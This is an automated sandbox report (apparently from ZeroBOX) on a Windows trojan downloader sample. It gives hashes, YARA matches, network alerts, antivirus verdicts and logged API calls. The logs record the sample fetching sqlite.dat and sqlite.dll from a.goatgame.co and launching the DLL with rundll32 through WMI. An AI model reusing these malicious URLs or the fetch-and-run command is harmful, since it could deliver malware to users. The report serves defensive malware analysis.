Summary | ZeroBOX

f13058cb1065b13600fcb4a4f48e8ef9.exe

Malicious Library OS Processor Check PE32 PE File DLL
Category FILE
Machine s1_win7_x6401
Started Sept. 15, 2021, 9:21 a.m.
Completed Sept. 15, 2021, 9:25 a.m.
Size 99.0KB
Type PE32 executable (console) Intel 80386, for MS Windows
MD5 dc0b13c9d739e5bd085ed2e8a8a263ab
SHA256 62e37fc3978558112a3b09722240c1dec37d08fa56a2b3bee251f91d24bf3b3f
CRC32 1BAAE89A
ssdeep 3072:eqSBzzamtOr4iXAtjosMGtAyzqRgZuSabhK/:eqgmmWiaRDdK/
Yara
  • PE_Header_Zero - PE File Signature
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
a.goatgame.co 104.21.79.144
IP Address Status Action
164.124.101.2 Active Moloch
172.67.146.70 Active Moloch

Suricata Alerts

Flow TCP 192.168.56.101:49197 -> 172.67.146.70:443
SID 906200056
Signature SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)
Category undefined

Suricata TLS

Flow TLSv1 192.168.56.101:49197 -> 172.67.146.70:443
Issuer C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Subject C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Fingerprint 2f:1b:f4:da:ad:da:2a:22:ea:dc:26:f0:35:83:25:0d:5d:29:4d:fb

API GetComputerNameW
Arguments computer_name: TEST22-PC
Status 1 Return 1 Repeated 0

API GlobalMemoryStatusEx
Arguments (none)
Status 1 Return 1 Repeated 0
section .gfids
request GET https://a.goatgame.co/userf/dat/2202/sqlite.dat
request GET https://a.goatgame.co/userf/dat/sqlite.dll
file C:\Users\test22\AppData\Local\Temp\sqlite.dll
buffer Buffer with sha1: 7c44952baa2433c554228dbd50613d7bf347ada5
API IWbemServices_ExecMethod
Arguments
  inargs.CurrentDirectory: None
  inargs.CommandLine: rundll32.exe "C:\Users\test22\AppData\Local\Temp\sqlite.dll",global
  inargs.ProcessStartupInformation: None
  outargs.ProcessId: 2236
  outargs.ReturnValue: 0
  flags: 0
  method: Create
  class: Win32_Process
Status 1 Return 0 Repeated 0
Lionic Trojan.Win32.Zenlod.trSL
MicroWorld-eScan Gen:Variant.Midie.98177
FireEye Gen:Variant.Midie.98177
ALYac Gen:Variant.Midie.98177
Cylance Unsafe
K7AntiVirus Trojan-Downloader ( 005823071 )
Alibaba TrojanDownloader:Win32/Zenlod.ffc81adc
K7GW Trojan-Downloader ( 005823071 )
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Agent.FWK
APEX Malicious
Kaspersky Trojan-Downloader.Win32.Zenlod.lle
BitDefender Gen:Variant.Midie.98177
Avast Win32:PWSX-gen [Trj]
Tencent Malware.Win32.Gencirc.11cd41c0
Ad-Aware Gen:Variant.Midie.98177
Emsisoft Gen:Variant.Midie.98177 (B)
DrWeb Trojan.Inject4.16523
McAfee-GW-Edition BehavesLike.Win32.Trojan.nh
Sophos Mal/Generic-S
Webroot W32.Trojan.Gen
Avira TR/Dldr.Agent.jzjrk
Antiy-AVL Trojan/Generic.ASMalwS.3499B3E
Kingsoft Win32.TrojDownloader.Zenlod.l.(kcloud)
Gridinsoft Trojan.Win32.Downloader.sa
Microsoft Trojan:Win32/Sabsik.FL.A!ml
GData Gen:Variant.Midie.98177
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Generic.C4629763
McAfee GenericRXAA-AA!DC0B13C9D739
MAX malware (ai score=85)
VBA32 BScope.Trojan.Injector
Malwarebytes Trojan.Downloader
Yandex Trojan.DL.Zenlod!mADlXNWinFs
Ikarus Trojan-Downloader.Win32.Agent
eGambit Unsafe.AI_Score_88%
Fortinet W32/Zenlod.FWK!tr.dldr
AVG Win32:PWSX-gen [Trj]
Panda Trj/GdSda.A
CrowdStrike win/malicious_confidence_100% (W)